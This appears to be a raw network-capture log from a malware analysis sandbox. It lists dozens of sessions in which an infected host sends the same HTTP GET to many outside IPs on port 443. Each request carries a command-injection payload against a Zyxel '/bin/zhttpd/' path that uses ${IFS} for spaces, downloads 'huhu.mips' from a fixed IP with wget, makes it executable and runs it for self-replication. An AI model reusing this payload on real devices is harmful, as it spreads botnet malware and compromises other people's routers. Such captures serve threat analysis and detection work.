                                            Feb 2, 2024 06:20:59.390050888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            982192.168.2.1541788136.161.193.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390063047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            983192.168.2.1557944147.29.203.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390089035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            984192.168.2.1543648198.132.51.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390162945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            985192.168.2.1542040181.68.55.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390193939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            986192.168.2.1551142174.141.232.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390249014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            987192.168.2.15479901.149.76.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390281916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            988192.168.2.1534770173.101.95.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390314102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            989192.168.2.154795677.39.137.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390362024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            990192.168.2.154868260.165.38.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390398026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            991192.168.2.154065240.202.238.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390445948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            992192.168.2.1549516183.84.254.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390465975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            993192.168.2.1560560125.252.22.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390516996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            994192.168.2.154707631.194.89.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390556097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            995192.168.2.156072042.182.79.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390598059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            996192.168.2.1548086108.74.79.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390636921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            997192.168.2.1537286167.240.202.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390676022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            998192.168.2.1533032122.182.242.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390716076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            999192.168.2.1540458172.2.136.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390763998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1000192.168.2.1549448124.119.13.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390808105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1001192.168.2.1546774124.177.86.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390865088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1002192.168.2.1550532163.156.47.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390887022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1003192.168.2.154456649.199.137.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390942097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1004192.168.2.1558198192.135.164.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.390976906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1005192.168.2.155839280.20.154.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391004086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1006192.168.2.154742413.142.219.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391043901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1007192.168.2.1542256121.186.37.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391063929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1008192.168.2.1558802132.198.14.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391083956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1009192.168.2.153643062.35.16.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391144037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1010192.168.2.1542420209.66.52.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391172886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1011192.168.2.155389220.49.234.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391210079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1012192.168.2.155715018.30.96.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391227007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1013192.168.2.1553346152.199.68.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391283035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1014192.168.2.155611865.143.55.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391314030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1015192.168.2.1541824204.125.95.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391352892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1016192.168.2.155420420.144.182.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391392946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1017192.168.2.1541148157.41.152.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391421080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1018192.168.2.1550198154.171.200.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391437054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1019192.168.2.1557046149.37.236.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391488075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1020192.168.2.1544130194.189.111.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391525984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1021192.168.2.1547638183.190.110.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391563892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1022192.168.2.1534766141.86.247.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391611099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1023192.168.2.1555184154.252.64.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391647100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1024192.168.2.153441814.13.82.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391683102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1025192.168.2.1560412197.169.250.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391711950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1026192.168.2.1543680212.68.250.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391755104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1027192.168.2.1537054175.58.89.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391791105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1028192.168.2.154051650.249.160.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391840935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1029192.168.2.1546098117.25.110.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391869068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1030192.168.2.1560118171.59.85.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391916037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1031192.168.2.1546588216.246.199.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391953945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1032192.168.2.154222861.93.251.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.391988039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1033192.168.2.1548124134.46.170.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392040968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1034192.168.2.1547820159.142.194.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392091036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1035192.168.2.1555542121.25.3.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392155886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1036192.168.2.1542280124.42.79.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392194986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1037192.168.2.1559532180.2.6.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392246008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1038192.168.2.154136096.90.218.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392285109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1039192.168.2.1556546176.88.86.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392313004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1040192.168.2.1559838157.144.215.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392338037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1041192.168.2.1553140107.66.76.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392405987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1042192.168.2.155468063.155.89.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392443895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1043192.168.2.1559562210.28.74.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392468929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1044192.168.2.1552910217.205.218.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392508984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1045192.168.2.1534218197.250.96.219443
                                            TimestampBytes transferredDirectionData
